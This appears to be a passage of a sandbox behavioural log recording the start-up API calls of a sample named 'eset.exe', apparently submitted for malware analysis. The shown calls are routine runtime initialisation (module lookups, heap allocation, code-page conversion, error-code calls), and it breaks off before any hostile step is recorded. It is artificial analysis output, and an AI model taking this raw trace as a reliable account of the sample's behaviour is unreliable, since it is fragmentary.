# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 10.11.2019 23:06:43.121 Process: id = "1" image_name = "eset.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eset.exe" page_root = "0x501b5000" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x99c [0022.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bf9e8 | out: lpSystemTimeAsFileTime=0x1bf9e8*(dwLowDateTime=0x910933c0, dwHighDateTime=0x1d5981b)) [0022.311] GetCurrentThreadId () returned 0x99c [0022.311] GetCurrentProcessId () returned 0x998 [0022.311] QueryPerformanceCounter (in: lpPerformanceCount=0x1bf9e0 | out: lpPerformanceCount=0x1bf9e0*=14259894147) returned 1 [0022.357] GetStartupInfoW (in: lpStartupInfo=0x1bf978 | out: lpStartupInfo=0x1bf978*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0022.357] GetProcessHeap () returned 0x5d0000 [0022.358] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0022.358] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0022.358] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0022.358] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0022.358] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0022.358] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0022.359] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0022.360] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0022.361] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3bc) returned 0x5ded68 [0022.361] GetCurrentThreadId () returned 0x99c [0022.361] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5df130 [0022.361] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5df150 [0022.361] GetStartupInfoW (in: lpStartupInfo=0x1bf948 | out: lpStartupInfo=0x1bf948*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1341cc3, hStdOutput=0xc1281c03, hStdError=0x0)) [0022.361] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0022.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0022.361] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0022.361] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\" " [0022.361] GetEnvironmentStringsW () returned 0x5df958* [0022.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0022.362] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x565) returned 0x5e0430 [0022.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5e0430, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0022.362] FreeEnvironmentStringsW (penv=0x5df958) returned 1 [0022.362] GetLastError () returned 0x7f [0022.362] SetLastError (dwErrCode=0x7f) [0022.362] GetLastError () returned 0x7f [0022.362] SetLastError (dwErrCode=0x7f) [0022.362] GetLastError () returned 0x7f [0022.362] SetLastError (dwErrCode=0x7f) [0022.362] GetACP () returned 0x4e4 [0022.362] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x220) returned 0x5e09a0 [0022.362] GetLastError () returned 0x7f [0022.362] SetLastError (dwErrCode=0x7f) [0022.362] IsValidCodePage (CodePage=0x4e4) returned 1 [0022.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1bf94c | out: lpCPInfo=0x1bf94c) returned 1 [0022.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1bf414 | out: lpCPInfo=0x1bf414) returned 1 [0022.362] GetLastError () returned 0x7f [0022.362] SetLastError (dwErrCode=0x7f) [0022.362] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.362] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x1bf198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.362] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1bf428 | out: lpCharType=0x1bf428) returned 1 [0022.362] GetLastError () returned 0x7f [0022.363] SetLastError (dwErrCode=0x7f) [0022.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x1bf168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.363] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0022.363] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1bef58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0022.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x1bf728, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83\x1c(Ádù\x1b", lpUsedDefaultChar=0x0) returned 256 [0022.363] GetLastError () returned 0x7f [0022.363] SetLastError (dwErrCode=0x7f) [0022.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1bf828, cbMultiByte=256, lpWideCharStr=0x1bf178, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.363] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0022.363] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1bef68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0022.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x1bf628, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83\x1c(Ádù\x1b", lpUsedDefaultChar=0x0) returned 256 [0022.363] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1352568, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eset.exe")) returned 0x2e [0022.363] GetLastError () returned 0x0 [0022.363] SetLastError (dwErrCode=0x0) [0022.363] GetLastError () returned 0x0 [0022.363] SetLastError (dwErrCode=0x0) [0022.363] GetLastError () returned 0x0 [0022.363] SetLastError (dwErrCode=0x0) [0022.363] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.364] SetLastError (dwErrCode=0x0) [0022.364] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.365] GetLastError () returned 0x0 [0022.365] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 [0022.366] SetLastError (dwErrCode=0x0) [0022.366] GetLastError () returned 0x0 